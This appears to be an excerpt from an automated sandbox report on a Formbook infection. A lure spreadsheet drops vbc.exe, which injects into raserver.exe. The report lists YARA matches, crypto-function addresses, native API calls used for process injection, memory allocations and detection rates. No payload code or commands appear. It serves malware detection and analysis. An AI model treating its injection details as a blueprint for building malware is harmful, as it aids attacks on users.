Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D009C		6_2_001D009C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D1121		6_2_001D1121
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D1B00		6_2_001D1B00
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D3BF8		6_2_001D3BF8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D4488		6_2_001D4488
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D5D50		6_2_001D5D50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D4EB1		6_2_001D4EB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D1700		6_2_001D1700
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D8000		6_2_001D8000
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D30D1		6_2_001D30D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001DC210		6_2_001DC210
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D8290		6_2_001D8290
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D8280		6_2_001D8280
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D82CB		6_2_001D82CB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D3B68		6_2_001D3B68
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D13B0		6_2_001D13B0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D6BD0		6_2_001D6BD0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D6BC0		6_2_001D6BC0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001DAC12		6_2_001DAC12
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D5C60		6_2_001D5C60
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D8498		6_2_001D8498
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D04EA		6_2_001D04EA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D4CE0		6_2_001D4CE0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D7D98		6_2_001D7D98
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D7DA8		6_2_001D7DA8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D9E51		6_2_001D9E51
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001DA749		6_2_001DA749
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00401026		7_2_00401026
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00401030		7_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041C2AE		7_2_0041C2AE
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00408C50		7_2_00408C50
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041BD71		7_2_0041BD71
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402D88		7_2_00402D88
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402D90		7_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B691		7_2_0041B691
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041C754		7_2_0041C754
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402FB0		7_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A4E0C6		7_2_00A4E0C6
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A7D005		7_2_00A7D005
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A53040		7_2_00A53040
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A6905A		7_2_00A6905A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A4E2E9		7_2_00A4E2E9
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AF1238		7_2_00AF1238
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A4F3CF		7_2_00A4F3CF
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A763DB		7_2_00A763DB
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A52305		7_2_00A52305
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A9A37B		7_2_00A9A37B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A57353		7_2_00A57353
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A85485		7_2_00A85485
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A61489		7_2_00A61489
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A8D47D		7_2_00A8D47D
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A6C5F0		7_2_00A6C5F0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A5351F		7_2_00A5351F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A54680		7_2_00A54680
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A5E6C1		7_2_00A5E6C1
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AF2622		7_2_00AF2622
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A5C7BC		7_2_00A5C7BC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AD579A		7_2_00AD579A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A857C3		7_2_00A857C3
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AEF8EE		7_2_00AEF8EE
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A7286D		7_2_00A7286D
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A5C85C		7_2_00A5C85C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A529B2		7_2_00A529B2
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AF098E		7_2_00AF098E
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A669FE		7_2_00A669FE
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AD5955		7_2_00AD5955
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00B03A83		7_2_00B03A83
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AFCBA4		7_2_00AFCBA4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A4FBD7		7_2_00A4FBD7
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00ADDBDA		7_2_00ADDBDA
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A77B00		7_2_00A77B00
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AEFDDD		7_2_00AEFDDD
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A80D3B		7_2_00A80D3B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A5CD5B		7_2_00A5CD5B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A82E2F		7_2_00A82E2F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A6EE4C		7_2_00A6EE4C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A60F3F		7_2_00A60F3F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EEE0C6		9_2_01EEE0C6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F0905A		9_2_01F0905A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EF3040		9_2_01EF3040
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F1D005		9_2_01F1D005
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EEF3CF		9_2_01EEF3CF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F163DB		9_2_01F163DB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F3A37B		9_2_01F3A37B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EF7353		9_2_01EF7353
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EF2305		9_2_01EF2305
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EEE2E9		9_2_01EEE2E9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F91238		9_2_01F91238
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F0C5F0		9_2_01F0C5F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EF351F		9_2_01EF351F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F25485		9_2_01F25485
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F01489		9_2_01F01489
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EFC7BC		9_2_01EFC7BC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F7579A		9_2_01F7579A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EFE6C1		9_2_01EFE6C1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EF4680		9_2_01EF4680
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F92622		9_2_01F92622
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F069FE		9_2_01F069FE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EF29B2		9_2_01EF29B2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F9098E		9_2_01F9098E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F75955		9_2_01F75955
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F8F8EE		9_2_01F8F8EE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F1286D		9_2_01F1286D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EFC85C		9_2_01EFC85C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F7DBDA		9_2_01F7DBDA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EEFBD7		9_2_01EEFBD7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F9CBA4		9_2_01F9CBA4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F17B00		9_2_01F17B00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01FA3A83		9_2_01FA3A83
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F8FDDD		9_2_01F8FDDD
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EFCD5B		9_2_01EFCD5B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F20D3B		9_2_01F20D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F1DF7C		9_2_01F1DF7C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F00F3F		9_2_01F00F3F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01F0EE4C		9_2_01F0EE4C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00088C50		9_2_00088C50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00082D88		9_2_00082D88
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00082D90		9_2_00082D90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0009C754		9_2_0009C754
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00082FB0		9_2_00082FB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_022667C7		9_2_022667C7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_022632FF		9_2_022632FF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_02263302		9_2_02263302
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_02261362		9_2_02261362
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_02265062		9_2_02265062
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_022608F9		9_2_022608F9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_02260902		9_2_02260902
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_022675B2		9_2_022675B2

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01EEDF5C appears 101 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01F33F92 appears 99 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01EEE2A8 appears 38 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01F3373B appears 237 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01F5F970 appears 77 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A4DF5C appears 104 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A9373B appears 238 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A93F92 appears 108 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00ABF970 appears 79 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A4E2A8 appears 37 times

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 7_2_004181B0 NtCreateFile,		7_2_004181B0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00418260 NtReadFile,		7_2_00418260
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004182E0 NtClose,		7_2_004182E0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00418390 NtAllocateVirtualMemory,		7_2_00418390
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004181B4 NtCreateFile,		7_2_004181B4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041825B NtReadFile,		7_2_0041825B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004182DA NtClose,		7_2_004182DA
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A400C4 NtCreateFile,LdrInitializeThunk,		7_2_00A400C4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A40078 NtResumeThread,LdrInitializeThunk,		7_2_00A40078
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,		7_2_00A40048
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A407AC NtCreateMutant,LdrInitializeThunk,		7_2_00A407AC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3F9F0 NtClose,LdrInitializeThunk,		7_2_00A3F9F0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3F900 NtReadFile,LdrInitializeThunk,		7_2_00A3F900
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,		7_2_00A3FAE8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_00A3FAD0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,		7_2_00A3FBB8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_00A3FB68
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,		7_2_00A3FC90
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,		7_2_00A3FC60
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,		7_2_00A3FD8C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_00A3FDC0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,		7_2_00A3FEA0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_00A3FED0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,		7_2_00A3FFB4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A410D0 NtOpenProcessToken,		7_2_00A410D0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A40060 NtQuerySection,		7_2_00A40060
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A401D4 NtSetValueKey,		7_2_00A401D4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A4010C NtOpenDirectoryObject,		7_2_00A4010C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A41148 NtOpenThread,		7_2_00A41148
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3F8CC NtWaitForSingleObject,		7_2_00A3F8CC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A41930 NtSetContextThread,		7_2_00A41930
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3F938 NtWriteFile,		7_2_00A3F938
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FAB8 NtQueryValueKey,		7_2_00A3FAB8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FA20 NtQueryInformationFile,		7_2_00A3FA20
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FA50 NtEnumerateValueKey,		7_2_00A3FA50
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FBE8 NtQueryVirtualMemory,		7_2_00A3FBE8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FB50 NtCreateKey,		7_2_00A3FB50
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FC30 NtOpenProcess,		7_2_00A3FC30
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A40C40 NtGetContextThread,		7_2_00A40C40
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FC48 NtSetInformationFile,		7_2_00A3FC48
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A41D80 NtSuspendThread,		7_2_00A41D80
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FD5C NtEnumerateKey,		7_2_00A3FD5C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FE24 NtWriteVirtualMemory,		7_2_00A3FE24
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FFFC NtCreateProcessEx,		7_2_00A3FFFC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FF34 NtQueueApcThread,		7_2_00A3FF34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE00C4 NtCreateFile,LdrInitializeThunk,		9_2_01EE00C4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE07AC NtCreateMutant,LdrInitializeThunk,		9_2_01EE07AC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDF9F0 NtClose,LdrInitializeThunk,		9_2_01EDF9F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDF900 NtReadFile,LdrInitializeThunk,		9_2_01EDF900
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFBB8 NtQueryInformationToken,LdrInitializeThunk,		9_2_01EDFBB8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFB68 NtFreeVirtualMemory,LdrInitializeThunk,		9_2_01EDFB68
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFB50 NtCreateKey,LdrInitializeThunk,		9_2_01EDFB50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFAE8 NtQueryInformationProcess,LdrInitializeThunk,		9_2_01EDFAE8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		9_2_01EDFAD0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFAB8 NtQueryValueKey,LdrInitializeThunk,		9_2_01EDFAB8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFDC0 NtQuerySystemInformation,LdrInitializeThunk,		9_2_01EDFDC0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFD8C NtDelayExecution,LdrInitializeThunk,		9_2_01EDFD8C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFC60 NtMapViewOfSection,LdrInitializeThunk,		9_2_01EDFC60
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFFB4 NtCreateSection,LdrInitializeThunk,		9_2_01EDFFB4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		9_2_01EDFED0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE01D4 NtSetValueKey,		9_2_01EE01D4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE1148 NtOpenThread,		9_2_01EE1148
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE010C NtOpenDirectoryObject,		9_2_01EE010C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE10D0 NtOpenProcessToken,		9_2_01EE10D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE0060 NtQuerySection,		9_2_01EE0060
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE0078 NtResumeThread,		9_2_01EE0078
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE0048 NtProtectVirtualMemory,		9_2_01EE0048
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDF938 NtWriteFile,		9_2_01EDF938
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE1930 NtSetContextThread,		9_2_01EE1930
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDF8CC NtWaitForSingleObject,		9_2_01EDF8CC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFBE8 NtQueryVirtualMemory,		9_2_01EDFBE8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFA50 NtEnumerateValueKey,		9_2_01EDFA50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFA20 NtQueryInformationFile,		9_2_01EDFA20
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE1D80 NtSuspendThread,		9_2_01EE1D80
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFD5C NtEnumerateKey,		9_2_01EDFD5C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFC90 NtUnmapViewOfSection,		9_2_01EDFC90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFC48 NtSetInformationFile,		9_2_01EDFC48
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EE0C40 NtGetContextThread,		9_2_01EE0C40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFC30 NtOpenProcess,		9_2_01EDFC30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFFFC NtCreateProcessEx,		9_2_01EDFFFC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFF34 NtQueueApcThread,		9_2_01EDFF34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFEA0 NtReadVirtualMemory,		9_2_01EDFEA0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EDFE24 NtWriteVirtualMemory,		9_2_01EDFE24
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_000981B0 NtCreateFile,		9_2_000981B0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00098260 NtReadFile,		9_2_00098260
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_000982E0 NtClose,		9_2_000982E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00098390 NtAllocateVirtualMemory,		9_2_00098390
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_000981B4 NtCreateFile,		9_2_000981B4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0009825B NtReadFile,		9_2_0009825B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_000982DA NtClose,		9_2_000982DA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0226632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,		9_2_0226632E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_022667C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,		9_2_022667C7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_02266332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,		9_2_02266332
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_022667C2 NtQueryInformationProcess,		9_2_022667C2

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: vbc[1].exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Sample is known by Antivirus

Source: (RFQ) No.109050.xlsx

ReversingLabs: Detection: 34%

Reads software policies

